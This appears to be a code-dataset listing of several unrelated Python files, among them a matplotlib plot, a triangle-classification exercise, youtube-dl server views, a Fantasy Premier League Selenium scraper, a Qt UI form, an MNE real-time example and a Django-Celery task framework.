content
stringlengths
5
1.05M
if __name__ == '__main__': import matplotlib matplotlib.use('Agg') from matplotlib import rc rc('font',**{'family':'serif','serif':'Computer Modern Roman','size':12}) rc('text', usetex=True) import numpy as np import pylab as plt def com_shape(fn): plt.figure(figsize=(4, 4)) plt.clf() plt.plot([1., 1., 3., 3., 5., 5., 1.], [1., 7., 7., 3., 3., 1., 1.], 'k-', lw=3.) plt.grid(True, alpha=0.5) plt.xlabel(r'$x$ (cm)') plt.ylabel(r'$y$ (cm)') plt.axis('equal') plt.xlim(-1., 8.) plt.ylim(-1., 8.) plt.savefig(fn) return None if __name__ == '__main__': fn = 'com_shape.pdf' com_shape(fn)
from .adagrad import Adagrad from .adgd import Adgd from .adgd_accel import AdgdAccel from .gd import Gd from .ig import Ig from .nesterov import Nesterov from .nest_line import NestLine from .ogm import Ogm from .polyak import Polyak from .rest_nest import RestNest
#refaça o exercicio 35 acrescentando o recurso de mostrar que tipo de triangulo será mostrado:] #equilátero: todos os lados são iguais; #isósceles: dois lados iguais; #escaleno: todos os lados diferentes reta1 = float(input('Informe reta1:')) reta2 = float(input('Informe reta2:')) reta3 = float(input('Informe reta3:')) if reta1 < reta2 + reta3 and reta2 < reta1 + reta3 and reta3 < reta1 + reta2: if reta1 == reta2 and reta2 == reta3: print('Temos um triângulo Equilátero!') elif reta1 == reta2 or reta2 == reta3 or reta3 == reta1: print('Temos um triângulo Isósceles!') else: print('Temos um triângulo Escaleno!!') else: print('Não se pode formar triângulo!')
from starlette.responses import JSONResponse from starlette.templating import Jinja2Templates from operator import itemgetter from pathlib import Path from ydl_server.config import app_config, get_finished_path from ydl_server.logdb import JobsDB, Job, Actions, JobType from datetime import datetime templates = Jinja2Templates(directory=str(Path(__file__).parent / "templates")) async def front_index(request): context = { 'request': request, 'ydl_version': request.app.state.ydlhandler.get_ydl_version(), 'ydl_name': request.app.state.ydlhandler.ydl_module_name, 'ydl_website': request.app.state.ydlhandler.ydl_website, } return templates.TemplateResponse('index.html', context=context) async def front_logs(request): context = { 'request': request, 'ydl_version': request.app.state.ydlhandler.get_ydl_version(), 'ydl_name': request.app.state.ydlhandler.ydl_module_name, 'ydl_website': request.app.state.ydlhandler.ydl_website, } return templates.TemplateResponse('logs.html', context=context) async def front_finished(request): context = { 'request': request, 'ydl_version': request.app.state.ydlhandler.get_ydl_version(), 'ydl_name': request.app.state.ydlhandler.ydl_module_name, 'ydl_website': request.app.state.ydlhandler.ydl_website, } return templates.TemplateResponse('finished.html', context=context) async def api_list_finished(request): root_dir = Path(get_finished_path()) matches = root_dir.glob('*') files = [{'name': f1.name, 'modified': f1.stat().st_mtime * 1000, 'children': sorted([{ 'name': f2.name, 'modified': f2.stat().st_mtime * 1000 } for f2 in f1.iterdir() if not f2.name.startswith('.')], key=itemgetter('modified'), reverse=True) if f1.is_dir() else None } for f1 in matches if not f1.name.startswith('.')] files = sorted(files, key=itemgetter('modified'), reverse=True) return JSONResponse({ "success": True, "files": files }) async def api_list_extractors(request): return JSONResponse(request.app.state.ydlhandler.get_ydl_extractors()) async def api_queue_size(request): db = JobsDB(readonly=True) jobs = db.get_all() return JSONResponse({ "success": True, "stats": { "queue": request.app.state.ydlhandler.queue.qsize(), "pending": len([job for job in jobs if job['status'] == "Pending"]), "running": len([job for job in jobs if job['status'] == "Running"]), "completed": len([job for job in jobs if job['status'] == "Completed"]), "failed": len([job for job in jobs if job['status'] == "Failed"]) } }) async def api_logs(request): db = JobsDB(readonly=True) return JSONResponse(db.get_all()) async def api_logs_purge(request): request.app.state.jobshandler.put((Actions.PURGE_LOGS, None)) return JSONResponse({"success": True}) async def api_logs_clean(request): request.app.state.jobshandler.put((Actions.CLEAN_LOGS, None)) return JSONResponse({"success": True}) async def api_queue_download(request): data = await request.form() if (app_config['ydl_server'].get('update_poll_delay_min') and (datetime.now() - app_config['ydl_last_update']).seconds > app_config['ydl_server'].get('update_poll_delay_min') * 60): job = Job("Youtube-dl Update", Job.PENDING, "", JobType.YDL_UPDATE, None, None) request.app.state.jobshandler.put((Actions.INSERT, job)) url = data.get("url") options = {'format': data.get("format")} if not url: return JSONResponse({ "success": False, "error": "'url' query parameter omitted" }) job = Job(url, Job.PENDING, "", JobType.YDL_DOWNLOAD, data.get("format"), url) request.app.state.jobshandler.put((Actions.INSERT, job)) print("Added url " + url + " to the download queue") return JSONResponse({"success": True, "url": url, "options": options}) async def api_metadata_fetch(request): data = await request.form() rc, stdout = request.app.state.ydlhandler.fetch_metadata(data.get("url")) if rc == 0: return JSONResponse(stdout) return JSONResponse({}, status_code=404) async def ydl_update(request): job = Job("Youtube-dl Update", Job.PENDING, "", JobType.YDL_UPDATE, None, None) request.app.state.jobshandler.put((Actions.INSERT, job)) return JSONResponse({ "success": True, })
import os import pickle import pandas as pd from datetime import datetime from time import sleep from tqdm import tqdm import re from selenium.webdriver.common.keys import Keys from selenium.webdriver.common.action_chains import ActionChains def scrape_current_player_stats(url, gameweek, mapper, driver): driver.get(url) sleep(2) players_dict = {} print('Collecting live player statistics..') for page in tqdm(range(1,19)): players = driver.find_elements_by_css_selector('#root > div:nth-child(2) > div > div > table > tbody > tr') # Get player stats for player in players: driver.execute_script("scroll(0,300);") ActionChains(driver).move_to_element(player).perform() sleep(0.5) # click on player info pop up player.find_element_by_tag_name('button').click() sleep(0.5) # Player name, club, position and fitness info_box = driver.find_element_by_css_selector('div.ElementDialog__Summary-gmefnd-0.eSbpQR') details = info_box.find_elements_by_tag_name('div')[0].text.split('\n') name, pos, club = details[0], details[1], details[2] # Get the player fitness and expected return if available try: fitness = driver.find_element_by_css_selector('div.sc-bdVaJa.edJDIA').text if '%' in fitness: fitness = int(''.join([x for x in fitness if x.isdigit()])) recovery_date = None elif 'Expected back' in fitness: fitness = 0 #! fix this recovery_date = datetime.strptime(f"{fitness.split('Expected back ')[1]} 2019", '%d %M %Y') elif 'Suspended' in fitness: fitness = 100 recovery_date = datetime.strptime(f"{fitness.split('Suspended until ')[1]} 2019", '%d %b %Y') else: fitness = 0 recovery_date = 'Unknown' except: fitness = 100 recovery_date = None # Get top level stats/info general_info = driver.find_element_by_css_selector('ul.ElementDialog__StatList-gmefnd-6.dYJASM').text.split('\n') info_tuples = [] for i in range(0,len(general_info),2): info_tuples.append((general_info[i], general_info[i+1])) ff_stats = driver.find_element_by_css_selector('ul.ElementDialog__FantasyStatList-gmefnd-10.ldSydD').text.split('\n') ff_tuples = [] for i in range(0,len(ff_stats),2): ff_tuples.append((ff_stats[i], ff_stats[i+1])) # Full player stats data for premier league season x = driver.page_source player_data = pd.read_html(x) if len(player_data) == 1: player_stats = None player_history = None elif len(player_data) == 2: if gameweek == 1: player_stats = None player_history = player_data[1] player_history.columns = [re.sub('\n','',x).strip().split(' ')[0] for x in player_history.columns] else: player_history = None player_stats = player_data[1] player_stats.columns = [re.sub('\n','',x).strip().split(' ')[0] for x in player_stats.columns] else: player_stats = player_data[1] player_stats.columns = [re.sub('\n','',x).strip().split(' ')[0] for x in player_stats.columns] player_history = player_data[2] player_history.columns = [re.sub('\n','',x).strip().split(' ')[0] for x in player_history.columns] # Close the info pop up ActionChains(driver).send_keys(Keys.ESCAPE).perform() players_dict[name] = {} players_dict[name]['details'] = {} players_dict[name]['details']['club'] = mapper[club.upper()] players_dict[name]['details']['position'] = pos players_dict[name]['details']['fitness'] = fitness players_dict[name]['details']['recovery_date'] = recovery_date players_dict[name]['stats'] = player_stats players_dict[name]['history'] = player_history for i, x in info_tuples: players_dict[name]['details'][i] = x for i, x in ff_tuples: players_dict[name]['details'][i] = x # Next page driver.find_element_by_css_selector('button:nth-child(4)').click() sleep(1) return players_dict def save_player_stats(player_stats): path = f'{os.path.dirname(os.getcwd())}\\data\\Players\\player_stats.pk' with open(path, 'wb') as file: pickle.dump(player_stats, file) def collect(driver, mapper): print('Collecting player statistics...') fixtures = f'{os.path.dirname(os.getcwd())}\\data\\Fixtures\\fixtures.csv' gameweek = min(pd.read_csv(fixtures)['gameweek']) stats_url = 'https://fantasy.premierleague.com/a/statistics/total_points' player_stats = scrape_current_player_stats(stats_url, gameweek, mapper, driver) save_player_stats(player_stats)
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'left_columnjzXejK.ui' ## ## Created by: Qt User Interface Compiler version 6.1.3 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from qt_core import * class Ui_LeftColumn(object): def setupUi(self, LeftColumn): if not LeftColumn.objectName(): LeftColumn.setObjectName(u"LeftColumn") LeftColumn.resize(240, 600) self.main_pages_layout = QVBoxLayout(LeftColumn) self.main_pages_layout.setSpacing(0) self.main_pages_layout.setObjectName(u"main_pages_layout") self.main_pages_layout.setContentsMargins(5, 5, 5, 5) self.menus = QStackedWidget(LeftColumn) self.menus.setObjectName(u"menus") self.menu_1 = QWidget() self.menu_1.setObjectName(u"menu_1") self.verticalLayout = QVBoxLayout(self.menu_1) self.verticalLayout.setSpacing(5) self.verticalLayout.setObjectName(u"verticalLayout") self.verticalLayout.setSizeConstraint(QLayout.SetDefaultConstraint) self.verticalLayout.setContentsMargins(5, 5, 5, 5) self.frame_btn_1 = QFrame(self.menu_1) self.frame_btn_1.setObjectName(u"frame_btn_1") self.frame_btn_1.setMinimumSize(QSize(0, 40)) self.frame_btn_1.setMaximumSize(QSize(16777215, 40)) self.frame_btn_1.setFrameShape(QFrame.NoFrame) self.frame_btn_1.setFrameShadow(QFrame.Raised) self.btn_1_layout = QVBoxLayout(self.frame_btn_1) self.btn_1_layout.setSpacing(0) self.btn_1_layout.setObjectName(u"btn_1_layout") self.btn_1_layout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.addWidget(self.frame_btn_1) self.frame_btn_2 = QFrame(self.menu_1) self.frame_btn_2.setObjectName(u"frame_btn_2") self.frame_btn_2.setMinimumSize(QSize(0, 40)) self.frame_btn_2.setMaximumSize(QSize(16777215, 40)) self.frame_btn_2.setFrameShape(QFrame.NoFrame) self.frame_btn_2.setFrameShadow(QFrame.Raised) self.btn_2_layout = QVBoxLayout(self.frame_btn_2) self.btn_2_layout.setSpacing(0) self.btn_2_layout.setObjectName(u"btn_2_layout") self.btn_2_layout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.addWidget(self.frame_btn_2) self.frame_btn_3 = QFrame(self.menu_1) self.frame_btn_3.setObjectName(u"frame_btn_3") self.frame_btn_3.setMinimumSize(QSize(0, 40)) self.frame_btn_3.setMaximumSize(QSize(16777215, 40)) self.frame_btn_3.setFrameShape(QFrame.NoFrame) self.frame_btn_3.setFrameShadow(QFrame.Raised) self.btn_3_layout = QVBoxLayout(self.frame_btn_3) self.btn_3_layout.setSpacing(0) self.btn_3_layout.setObjectName(u"btn_3_layout") self.btn_3_layout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.addWidget(self.frame_btn_3) self.frame_btn_4 = QFrame(self.menu_1) self.frame_btn_4.setObjectName(u"frame_btn_4") self.frame_btn_4.setMinimumSize(QSize(0, 40)) self.frame_btn_4.setMaximumSize(QSize(16777215, 40)) self.frame_btn_4.setFrameShape(QFrame.NoFrame) self.frame_btn_4.setFrameShadow(QFrame.Raised) self.btn_4_layout = QVBoxLayout(self.frame_btn_4) self.btn_4_layout.setSpacing(0) self.btn_4_layout.setObjectName(u"btn_4_layout") self.btn_4_layout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.addWidget(self.frame_btn_4) self.verticalSpacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding) self.verticalLayout.addItem(self.verticalSpacer) self.menus.addWidget(self.menu_1) self.menu_2 = QWidget() self.menu_2.setObjectName(u"menu_2") self.verticalLayout_2 = QVBoxLayout(self.menu_2) self.verticalLayout_2.setSpacing(5) self.verticalLayout_2.setObjectName(u"verticalLayout_2") self.verticalLayout_2.setContentsMargins(5, 5, 5, 5) self.label_2 = QLabel(self.menu_2) self.label_2.setObjectName(u"label_2") font = QFont() font.setPointSize(16) self.label_2.setFont(font) self.label_2.setStyleSheet(u"font-size: 16pt") self.label_2.setAlignment(Qt.AlignCenter) self.verticalLayout_2.addWidget(self.label_2) self.menus.addWidget(self.menu_2) self.main_pages_layout.addWidget(self.menus) self.retranslateUi(LeftColumn) self.menus.setCurrentIndex(0) QMetaObject.connectSlotsByName(LeftColumn) # setupUi def retranslateUi(self, LeftColumn): LeftColumn.setWindowTitle(QCoreApplication.translate("LeftColumn", u"Form", None)) self.label_2.setText(QCoreApplication.translate("LeftColumn", u"Menu 2 - Left Menu", None)) # retranslateUi
""" ======================================================== Compute real-time evoked responses with FieldTrip client ======================================================== This example demonstrates how to connect the MNE real-time system to the Fieldtrip buffer using FieldTripClient class. This example was tested in simulation mode neuromag2ft --file MNE-sample-data/MEG/sample/sample_audvis_raw.fif using a modified version of neuromag2ft available at http://neuro.hut.fi/~mainak/neuromag2ft-2.0.0.zip to run the FieldTrip buffer. Then running this example acquires the data on the client side. Since the Fieldtrip buffer does not contain all the measurement information required by the MNE real-time processing pipeline, an info dictionary must be provided to instantiate FieldTripClient. Alternatively, the MNE-Python script will try to guess the missing measurement info from the Fieldtrip Header object. Together with RtEpochs, this can be used to compute evoked responses using moving averages. """ # Author: Mainak Jas <[email protected]> # # License: BSD (3-clause) import matplotlib.pyplot as plt import mne from mne.viz import plot_events from mne.realtime import FieldTripClient, RtEpochs print(__doc__) # select the left-auditory condition event_id, tmin, tmax = 1, -0.2, 0.5 # user must provide list of bad channels because # FieldTrip header object does not provide that bads = ['MEG 2443', 'EEG 053'] plt.ion() # make plot interactive _, ax = plt.subplots(2, 1, figsize=(8, 8)) # create subplots with FieldTripClient(host='localhost', port=1972, tmax=150, wait_max=10) as rt_client: # get measurement info guessed by MNE-Python raw_info = rt_client.get_measurement_info() # select gradiometers picks = mne.pick_types(raw_info, meg='grad', eeg=False, eog=True, stim=True, exclude=bads) # create the real-time epochs object rt_epochs = RtEpochs(rt_client, event_id, tmin, tmax, stim_channel='STI 014', picks=picks, reject=dict(grad=4000e-13, eog=150e-6), decim=1, isi_max=10.0, proj=None) # start the acquisition rt_epochs.start() for ii, ev in enumerate(rt_epochs.iter_evoked()): print("Just got epoch %d" % (ii + 1)) ev.pick_types(meg=True, eog=False) if ii == 0: evoked = ev else: evoked += ev ax[0].cla() ax[1].cla() # clear axis plot_events(rt_epochs.events[-5:], sfreq=ev.info['sfreq'], first_samp=-rt_client.tmin_samp, axes=ax[0]) evoked.plot(axes=ax[1]) # plot on second subplot ax[1].set_title('Evoked response for gradiometer channels' '(event_id = %d)' % event_id) plt.pause(0.05) plt.draw() plt.close()
import os import base64 import logging import pickle import uuid import import_string from datetime import timedelta from django.core.management import call_command, get_commands from django.core.exceptions import ImproperlyConfigured from django.core.cache import caches from django.db import close_old_connections, transaction from django.db.utils import InterfaceError, OperationalError from django.utils.timezone import now, localtime try: from celery import Task, shared_task, current_app from celery.result import AsyncResult from celery.exceptions import CeleryError, TimeoutError from kombu.utils import uuid as task_uuid from kombu import serialization except ImportError: raise ImproperlyConfigured('Missing celery library, please install it') from .celery import CeleryQueueEnum from .config import settings logger = logging.getLogger(__name__) cache = caches[settings.CACHE_NAME] def default_unique_key_generator(task, prefix, task_args, task_kwargs): task_args = task_args or () task_kwargs = task_kwargs or {} _, _, data = serialization.dumps( (list(task_args), task_kwargs), task._get_app().conf.task_serializer, ) return str(uuid.uuid5(uuid.NAMESPACE_DNS, ':'.join((prefix, task.name, data)))) class NotTriggeredCeleryError(CeleryError): pass class IgnoredResult: state = 'IGNORED' id = None def get(self, *args, **kwargs): return None def successful(self): return False def failed(self): return False @property def task_id(self): return self.id class ResultWrapper: def __init__(self, invocation_id, task, args, kwargs, options, result=None): self._invocation_id = invocation_id self._result = result self._task = task self._args = args self._kwargs = kwargs self._options = options def on_apply(self): pass def on_trigger(self): pass def on_unique(self): pass def on_ignored(self): pass def on_timeout(self): pass def set_result(self, result): self._result = result def set_options(self, options): self._options = options def then(self, *args, **kwargs): return self._result.then(*args, **kwargs) def get(self, *args, **kwargs): if self._result is None: raise NotTriggeredCeleryError('Celery task has not been triggered yet') else: try: return self._result.get(*args, **kwargs) except TimeoutError as ex: self.timeout(ex) raise ex def timeout(self, ex): self._task.on_invocation_timeout( self._invocation_id, self._args, self._kwargs, self.task_id, ex, self._options, self ) @property def state(self): return 'WAITING' if not self._result else self._result.state def successful(self): return self._result is not None and self._result.successful() def failed(self): return self._result is not None and self._result.failed() @property def id(self): return None if self._result is None else self._result.task_id @property def task_id(self): return self.id class DjangoTask(Task): abstract = True # Support set retry delay in list. Retry countdown value is get from list where index is attempt # number (request.retries) default_retry_delays = None # Unique task if task with same input already exists no extra task is created and old task result is returned unique = False unique_key_generator = default_unique_key_generator _stackprotected = True ignore_task_after_success_timedelta = None result_wrapper_class = ResultWrapper def __new__(cls, *args, **kwargs): queue = getattr(cls, 'queue', None) if isinstance(queue, CeleryQueueEnum): cls.queue = queue.queue_name for k, v in queue.default_task_kwargs.items(): if getattr(cls, k, None) is None: setattr(cls, k, v) return super().__new__(cls, *args, **kwargs) @property def max_queue_waiting_time(self): return settings.DEFAULT_TASK_MAX_QUEUE_WAITING_TIME @property def stale_time_limit(self): return settings.DEFAULT_TASK_STALE_TIME_LIMIT def on_invocation_apply(self, invocation_id, args, kwargs, options, result): """ Method is called when task was applied with the requester. :param invocation_id: UUID of the requester invocation :param args: input task args :param kwargs: input task kwargs :param options: input task options :param result: result which will be finally returned """ result.on_apply() def on_invocation_trigger(self, invocation_id, args, kwargs, task_id, options, result): """ Task has been triggered and placed in the queue. :param invocation_id: UUID of the requester invocation :param args: input task args :param kwargs: input task kwargs :param task_id: UUID of the celery task :param options: input task options :param result: result which will be finally returned """ result.on_trigger() def on_invocation_unique(self, invocation_id, args, kwargs, task_id, options, result): """ Task has been triggered but the same task is already active. Therefore only pointer to the active task is returned. :param invocation_id: UUID of the requester invocation :param args: input task args :param kwargs: input task kwargs :param task_id: UUID of the celery task :param options: input task options :param result: result which will be finally returned """ result.on_unique() def on_invocation_ignored(self, invocation_id, args, kwargs, task_id, options, result): """ Task has been triggered but the task has set ignore_task_after_success_timedelta and task was sucessfully completed in this timeout. Therefore no new task is invoked. :param invocation_id: UUID of the requester invocation :param args: input task args :param kwargs: input task kwargs :param task_id: UUID of the celery task :param options: input task options :param result: result which will be finally returned """ result.on_ignored() def on_invocation_timeout(self, invocation_id, args, kwargs, task_id, ex, options, result): """ Task has been joined to another unique async result. :param invocation_id: UUID of the requester invocation :param args: input task args :param kwargs: input task kwargs :param task_id: UUID of the celery task :param ex: celery TimeoutError :param options: input task options :param result: result which will be finally returned """ result.on_timeout() def on_task_start(self, task_id, args, kwargs): """ Task has been started with worker. :param task_id: UUID of the celery task :param args: input task args :param kwargs: input task kwargs """ pass def on_task_retry(self, task_id, args, kwargs, exc, eta): """ Task failed but will be retried. :param task_id: UUID of the celery task :param args: task args :param kwargs: task kwargs :param exc: raised exception which caused retry :param eta: time to next retry """ pass def on_task_failure(self, task_id, args, kwargs, exc, einfo): """ Task failed and will not be retried. :param task_id: UUID of the celery task :param args: task args :param kwargs: task kwargs :param exc: raised exception :param einfo: exception traceback """ pass def on_task_success(self, task_id, args, kwargs, retval): """ Task was successful. :param task_id: UUID of the celery task :param args: task args :param kwargs: task kwargs :param retval: task result """ pass def on_failure(self, exc, task_id, args, kwargs, einfo): super().on_failure(exc, task_id, args, kwargs, einfo) self.on_task_failure(task_id, args, kwargs, exc, einfo) self._clear_unique_key(args, kwargs) def on_success(self, retval, task_id, args, kwargs): super().on_success(retval, task_id, args, kwargs) self.on_task_success(task_id, args, kwargs, retval) self._clear_unique_key(args, kwargs) self._set_ignore_task_after_success(args, kwargs) def __call__(self, *args, **kwargs): """ Overrides parent which works with thread stack. We didn't want to allow change context which was generated in one of apply methods. Call task directly is now disallowed. """ req = self.request_stack.top if not req or req.called_directly: raise CeleryError( 'Task cannot be called directly. Please use apply, apply_async or apply_async_on_commit methods' ) if req._protected: raise CeleryError('Request is protected') # request is protected (no usage in celery but get from function _install_stack_protection in # celery library) req._protected = 1 # Every set attr is sent here self.on_task_start(req.id, args, kwargs) return self._start(*args, **kwargs) def _start(self, *args, **kwargs): return self.run(*args, **kwargs) def _get_unique_key(self, task_args, task_kwargs): return self.unique_key_generator( settings.UNIQUE_TASK_KEY_PREFIX, task_args, task_kwargs ) if self.unique else None def _get_ignore_task_after_success_key(self, task_args, task_kwargs): return ( self.unique_key_generator( settings.IGNORE_TASK_AFTER_SUCCESS_KEY_PREFIX, task_args, task_kwargs ) if self.ignore_task_after_success_timedelta else None ) def is_processing(self, args=None, kwargs=None): unique_key = self._get_unique_key(args, kwargs) if unique_key is None: raise CeleryError('Process check can be performed for only unique tasks') return cache.get(unique_key) is not None def _ignore_task_after_success(self, key): return key and cache.get(key) def _set_ignore_task_after_success(self, task_args, task_kwargs): ignore_task_after_success_key = self._get_ignore_task_after_success_key(task_args, task_kwargs) if ignore_task_after_success_key: current_time = localtime() cache.add( ignore_task_after_success_key, True, (current_time + self.ignore_task_after_success_timedelta - current_time).total_seconds() ) def _clear_unique_key(self, task_args, task_kwargs): unique_key = self._get_unique_key(task_args, task_kwargs) if unique_key: cache.delete(unique_key) def _get_unique_task_id(self, unique_key, task_id, stale_time_limit): if unique_key and not stale_time_limit: raise CeleryError('For unique tasks is require set task stale_time_limit') if unique_key and not self._get_app().conf.task_always_eager: if cache.add(unique_key, task_id, stale_time_limit): return task_id else: unique_task_id = cache.get(unique_key) return ( unique_task_id if unique_task_id else self._get_unique_task_id(unique_key, task_id, stale_time_limit) ) else: return task_id def _compute_eta(self, eta, countdown, trigger_time): if countdown is not None: return trigger_time + timedelta(seconds=countdown) elif eta: return eta else: return trigger_time def _compute_expires(self, expires, time_limit, stale_time_limit, trigger_time): expires = self.expires if expires is None else expires if expires is not None: return trigger_time + timedelta(seconds=expires) if isinstance(expires, int) else expires elif stale_time_limit is not None and time_limit is not None: return trigger_time + timedelta(seconds=stale_time_limit - time_limit) else: return None def _get_time_limit(self, time_limit): if time_limit is not None: return time_limit elif self.time_limit is not None: return self.time_limit else: return self._get_app().conf.task_time_limit def _get_soft_time_limit(self, soft_time_limit): if soft_time_limit is not None: return soft_time_limit elif self.soft_time_limit is not None: return self.soft_time_limit else: return self._get_app().conf.task_soft_time_limit def _get_stale_time_limit(self, expires, time_limit, stale_time_limit, trigger_time): if stale_time_limit is not None: return stale_time_limit elif self.stale_time_limit is not None: return self.stale_time_limit elif time_limit is not None and self.max_queue_waiting_time: autoretry_for = getattr(self, 'autoretry_for', None) if autoretry_for and self.default_retry_delays: return ( (time_limit + self.max_queue_waiting_time) * len(self.default_retry_delays) + 1 + sum(self.default_retry_delays) ) elif autoretry_for: return ( (time_limit + self.max_queue_waiting_time + self.default_retry_delay) * self.max_retries + time_limit + self.max_queue_waiting_time ) else: return time_limit + self.max_queue_waiting_time else: return None def _apply_and_get_result(self, args, kwargs, invocation_id, is_async=False, **options): if is_async: return self._call_super_apply_async( args=args, kwargs=kwargs, is_async=is_async, invocation_id=invocation_id, **options ) else: return super().apply( args=args, kwargs=kwargs, is_async=is_async, invocation_id=invocation_id, **options ) def _trigger(self, result, args, kwargs, invocation_id, task_id=None, eta=None, countdown=None, expires=None, time_limit=None, soft_time_limit=None, stale_time_limit=None, ignore_task_after_success=None, is_async=True, **options): app = self._get_app() task_id = task_id or task_uuid() time_limit = self._get_time_limit(time_limit) trigger_time = now() eta = self._compute_eta(eta, countdown, trigger_time) countdown = None stale_time_limit = self._get_stale_time_limit(expires, time_limit, stale_time_limit, trigger_time) expires = self._compute_expires(expires, time_limit, stale_time_limit, trigger_time) options.update(dict( invocation_id=invocation_id, task_id=task_id, trigger_time=trigger_time, time_limit=time_limit, soft_time_limit=self._get_soft_time_limit(soft_time_limit), eta=eta, countdown=countdown, expires=expires, is_async=is_async, stale_time_limit=stale_time_limit )) ignore_task_after_success = ( ignore_task_after_success if ignore_task_after_success is not None else self.ignore_task_after_success_timedelta is not None ) ignore_task_after_success_key = ( self._get_ignore_task_after_success_key(args, kwargs) if ignore_task_after_success else None ) if self._ignore_task_after_success(ignore_task_after_success_key): result.set_options(options) result.set_result(IgnoredResult()) self.on_invocation_ignored(invocation_id, args, kwargs, task_id, options, result) else: unique_key = self._get_unique_key(args, kwargs) unique_task_id = self._get_unique_task_id(unique_key, task_id, stale_time_limit) if is_async and unique_task_id != task_id: options['task_id'] = unique_task_id result.set_options(options) self.on_invocation_unique(invocation_id, args, kwargs, unique_task_id, options, result) result.set_result(AsyncResult(unique_task_id, app=app)) else: result.set_options(options) self.on_invocation_trigger(invocation_id, args, kwargs, task_id, options, result) result.set_result(self._apply_and_get_result(args, kwargs, **options)) def _first_apply(self, args=None, kwargs=None, invocation_id=None, is_async=True, is_on_commit=False, using=None, **options): invocation_id = invocation_id or task_uuid() apply_time = now() app = self._get_app() queue = str(options.get('queue', getattr(self, 'queue', app.conf.task_default_queue))) options.update(dict( queue=queue, is_async=is_async, invocation_id=invocation_id, apply_time=apply_time, is_on_commit=is_on_commit, using=using, )) result = self.result_wrapper_class(invocation_id, self, args, kwargs, options) self.on_invocation_apply(invocation_id, args, kwargs, options, result) if is_on_commit: self_inst = self def _apply_on_commit(): self_inst._trigger(result, args=args, kwargs=kwargs, **options) transaction.on_commit(_apply_on_commit, using=using) else: self._trigger(result, args=args, kwargs=kwargs, **options) return result def apply_async_on_commit(self, args=None, kwargs=None, using=None, **options): return self._first_apply(args=args, kwargs=kwargs, is_async=True, is_on_commit=True, using=using, **options) def apply(self, args=None, kwargs=None, **options): if 'retries' in options or 'is_async' in options: return super().apply(args=args, kwargs=kwargs, **options) else: return self._first_apply(args=args, kwargs=kwargs, is_async=False, **options) def _call_super_apply_async(self, args=None, kwargs=None, task_id=None, **options): """ Apply async can be called from two sources. By hand from executor or automatically via retry function. If retry function is used id is get from request. But we sometimes we need to change options before it (some options is not transfered to the worker for example properties, therefore not all changed options in _first_apply method is available in retry method) """ task_id = task_id or self.request.id or uuid() if settings.AUTO_SQS_MESSAGE_GROUP_ID: if 'MessageGroupId' not in options: options['MessageGroupId'] = task_id return super().apply_async(args=args, kwargs=kwargs, task_id=task_id, **options) def apply_async(self, args=None, kwargs=None, **options): try: if self.request.id: return self._call_super_apply_async(args=args, kwargs=kwargs, **options) else: return self._first_apply( args=args, kwargs=kwargs, is_async=True, **options ) except (InterfaceError, OperationalError) as ex: logger.warning('Closing old database connections, following exception thrown: %s', str(ex)) close_old_connections() raise ex def delay_on_commit(self, *args, **kwargs): options = kwargs.pop('options', {}) self.apply_async_on_commit(args, kwargs, **options) def retry(self, args=None, kwargs=None, exc=None, throw=True, eta=None, countdown=None, max_retries=None, default_retry_delays=None, **options): max_retries = max_retries or self.max_retries if default_retry_delays or (eta is None and countdown is None and self.default_retry_delays): default_retry_delays = self.default_retry_delays if default_retry_delays is None else default_retry_delays max_retries = len(default_retry_delays) countdown = default_retry_delays[self.request.retries] if self.request.retries < max_retries else None if not eta and countdown is None: countdown = self.default_retry_delay if not eta: eta = now() + timedelta(seconds=countdown) if max_retries is None or self.request.retries < max_retries: # In the opposite way task will be failed self.on_task_retry(self.request.id, args, kwargs, exc, eta) return super().retry( args=args, kwargs=kwargs, exc=exc, throw=throw, eta=eta, max_retries=max_retries, **options ) def apply_async_and_get_result(self, args=None, kwargs=None, timeout=None, propagate=True, **options): """ Apply task in an asynchronous way, wait defined timeout and get AsyncResult or TimeoutError :param args: task args :param kwargs: task kwargs :param timeout: timout in seconds to wait for result :param propagate: propagate or not exceptions from celery task :param options: apply_async method options :return: AsyncResult or TimeoutError """ result = self.apply_async(args=args, kwargs=kwargs, **options) if timeout is None or timeout > 0: return result.get(timeout=timeout, propagate=propagate) else: ex = TimeoutError('The operation timed out.') result.timeout(ex) raise ex def get_command_kwargs(self): return {} def obj_to_string(obj): return base64.encodebytes(pickle.dumps(obj)).decode('utf8') def string_to_obj(obj_string): return pickle.loads(base64.decodebytes(obj_string.encode('utf8'))) def get_command_task_name(command_name): if command_name not in get_commands(): raise ImproperlyConfigured(f'Cannot generate celery task from command "{command_name}", command not found') app_name = get_commands()[command_name] return 'command.{}.{}'.format(app_name, command_name) def get_django_command_task(command_name): command_task_name = get_command_task_name(command_name) if command_task_name not in current_app.tasks: raise ImproperlyConfigured( 'Command was not found please check DJANGO_CELERY_EXTENSIONS_AUTO_GENERATE_TASKS_DJANGO_COMMANDS setting' ) return current_app.tasks[command_task_name] def auto_convert_commands_to_tasks(): for name in settings.AUTO_GENERATE_TASKS_DJANGO_COMMANDS: task_name = get_command_task_name(name) def generate_command_task(command_name, task_name): shared_task_kwargs = { **dict( bind=True, name=task_name, ignore_result=True, ), **(settings.AUTO_GENERATE_TASKS_DEFAULT_CELERY_KWARGS or {}), **(settings.AUTO_GENERATE_TASKS_DJANGO_COMMANDS[command_name] or {}) } if 'autoretry_for' in shared_task_kwargs: shared_task_kwargs['autoretry_for'] = [ import_string(exception_class) if isinstance(exception_class, str) else exception_class for exception_class in shared_task_kwargs['autoretry_for'] ] @shared_task( **shared_task_kwargs ) def command_task(self, command_args=None, **kwargs): command_args = [] if command_args is None else command_args call_command( command_name, settings=os.environ.get('DJANGO_SETTINGS_MODULE'), *command_args, **self.get_command_kwargs() ) generate_command_task(name, task_name)
